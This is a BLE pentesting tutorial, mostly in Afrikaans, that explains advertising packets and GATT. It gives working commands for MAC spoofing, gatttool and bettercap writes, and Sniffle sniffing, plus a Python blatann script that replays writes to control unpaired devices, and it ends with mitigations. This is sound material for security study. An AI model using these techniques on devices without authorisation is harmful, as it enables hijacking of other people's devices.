Pentesting BLE - Bluetooth Low Energy

Reading time: 9 minutes

Inleiding

Beskikbaar sedert die Bluetooth 4.0-spesifikasie, gebruik BLE slegs 40 kanale wat die reeks 2400 tot 2483.5 MHz dek. In teenstelling gebruik tradisionele Bluetooth 79 kanale in dieselfde reeks.

BLE devices kommunikeer deur die stuur van advertising packets (beacons); hierdie pakkette maak die bestaan van die BLE-toestel aan ander nabygeleë toestelle bekend. Hierdie beacons send data soms ook.

Die luisterende toestel, ook 'n central device genoem, kan op 'n advertising packet reageer met 'n SCAN request wat spesifiek na die advertising-toestel gestuur word. Die response op daardie scan gebruik dieselfde struktuur as die advertising packet met bykomende inligting wat nie op die aanvanklike advertising request gepas het nie, soos die volledige toestelnaam.

Die preamble byte sinkroniseer die frekwensie, terwyl die vier-byte access address 'n connection identifier is, wat gebruik word in scenario's waar veelvuldige toestelle probeer verbindings op dieselfde kanale te vestig. Daarna bevat die Protocol Data Unit (PDU) die advertising data. Daar is verskeie tipes PDU; die mees algemeen gebruikte is ADV_NONCONN_IND en ADV_IND. Toestelle gebruik die ADV_NONCONN_IND PDU-tipe as hulle don’t accept connections, sodat hulle slegs data in die advertising packet stuur. Toestelle gebruik ADV_IND as hulle allow connections en stop sending advertising packets sodra 'n connection gevestig is.

GATT

Die Generic Attribute Profile (GATT) definieer hoe die device should format and transfer data. Wanneer jy 'n BLE-toestel se aanval-oppervlak ontleed, sal jy dikwels jou aandag op die GATT (of GATTs) konsentreer, omdat dit is hoe device functionality gets triggered en hoe data gestoor, gegroepeer en gewysig word. Die GATT lys 'n toestel se characteristics, descriptors, en services in 'n tabel as óf 16- of 32-bits waardes. 'n characteristic is 'n data waarde sent tussen die central device en peripheral. Hierdie characteristics kan descriptors hê wat provide additional information about them. Characteristics word dikwels grouped in services as hulle verwant is aan die uitvoering van 'n spesifieke aksie.

Enumerasie

hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66

GATTool

GATTool laat toe om 'n verbinding met 'n ander toestel te vestig, daardie toestel se characteristics te lys, en sy attributes te lees en te skryf.
GATTTool kan 'n interaktiewe shell begin met die -I opsie:

gatttool -i hci0 -I
[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful
[A4:CF:12:6C:B3:76][LE]> characteristics
handle: 0x0002, char properties: 0x20, char value handle:
0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb
handle: 0x0015, char properties: 0x02, char value handle:
0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb
[...]

# Write data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value>
gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)

# Read data
gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16

# Read connecting with an authenticated encrypted connection
gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c

Bettercap

# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06

Sniffing en aktief beheer van unpaired BLE-toestelle

Baie goedkoop BLE-perifere toestelle dwing nie pairing/bonding af nie. Sonder bonding word die Link Layer encryption nooit aangeskakel nie, so ATT/GATT-verkeer is in duidelike teks. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device.

Sniffing met Sniffle (CC26x2/CC1352)

Hardware: 'n Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group’s Sniffle firmware.

Installeer Sniffle en sy Wireshark extcap op Linux:

if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then
echo "[+] - Sniffle not installed! Installing at 1.10.0..."
sudo mkdir -p /opt/sniffle
sudo chown -R $USER:$USER /opt/sniffle
pushd /opt/sniffle
wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz
tar xvf v1.10.0.tar.gz
# Install Wireshark extcap for user and root only
mkdir -p $HOME/.local/lib/wireshark/extcap
ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap
sudo mkdir -p /root/.local/lib/wireshark/extcap
sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap
popd
else
echo "[+] - Sniffle already installed at 1.10.0"
fi

Flits Sonoff met Sniffle firmware (verseker dat jou seriële toestel ooreenstem, bv. /dev/ttyUSB0):

pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd

Vang in Wireshark via die Sniffle extcap en skuif vinnig na toestandveranderende skrywe deur te filter:

_ws.col.info contains "Sent Write Command"

Dit beklemtoon ATT Write Commands vanaf die kliënt; die handle en value stem dikwels direk ooreen met toestelaksies (bv., write 0x01 to a buzzer/alert characteristic, 0x00 to stop).

Sniffle CLI vinnige voorbeelde:

python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap

Alternatiewe sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin werk ook. Op klein/goedkoop Nordic dongles oorskryf jy tipies die USB bootloader om die sniffer firmware te laai, so hou jy óf 'n toegewyde sniffer dongle óf benodig 'n J-Link/JTAG om die bootloader later te herstel.

Aktiewe beheer via GATT

Sodra jy 'n writable characteristic handle en value uit die sniffed traffic geïdentifiseer het, koppel as enige central en voer dieselfde write uit:

• Met Nordic nRF Connect for Desktop (BLE app):

• Kies die nRF52/nRF52840 dongle, scan en verbind met die target.

• Blaai deur die GATT database, lokaliseer die target characteristic (het dikwels 'n vriendelike naam, bv. Alert Level).

• Voer 'n Write uit met die sniffed bytes (bv. 01 om te aktiveer, 00 om te stop).

• Automatiseer op Windows met 'n Nordic dongle deur Python + blatann te gebruik:

import time
import blatann

# CONFIG
COM_PORT = "COM29"  # Replace with your COM port
TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC

target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p")

# CONNECT
ble_device = blatann.BleDevice(COM_PORT)
ble_device.configure()
ble_device.open()
print(f"[-] Connecting to {TARGET_MAC}...")
peer = ble_device.connect(target_address).wait()
if not peer:
print("[!] Connection failed.")
ble_device.close()
raise SystemExit(1)

print("Connected. Discovering services...")
peer.discover_services().wait(5, exception_on_timeout=False)

# Example: write 0x01/0x00 to a known handle
for service in peer.database.services:
for ch in service.characteristics:
if ch.handle == 0x000b:  # Replace with your handle
print("[!] Beeping.")
ch.write(b"\x01")
time.sleep(2)
print("[+] And relax.")
ch.write(b"\x00")

print("[-] Disconnecting...")
peer.disconnect()
peer.wait_for_disconnect()
ble_device.close()

Operasionele notas en mitigasies

• Voorkeur: Sonoff+Sniffle op Linux vir robuuste kanaalspring en verbindingsopvolging. Hou 'n ekstra Nordic sniffer as rugsteun.
• Sonder pairing/bonding kan enige nabygeleë aanvaller writes waarneem en hul eie herspeel of saamstel na nie-geauthentiseerde writable characteristics.
• Mitigasies: vereis pairing/bonding en dwing enkripsie af; stel characteristic permissions om geauthentiseerde writes te vereis; minimaliseer nie-geauthentiseerde writable characteristics; valideer GATT ACLs met Sniffle/nRF Connect.

Verwysings

• Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners
• Sniffle – A sniffer for Bluetooth 5 and 4.x LE
• Firmware installation for Sonoff USB Dongle (Sniffle README)
• Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)
• Nordic nRF Sniffer for Bluetooth LE
• nRF Connect for Desktop
• blatann – Python BLE library for Nordic devices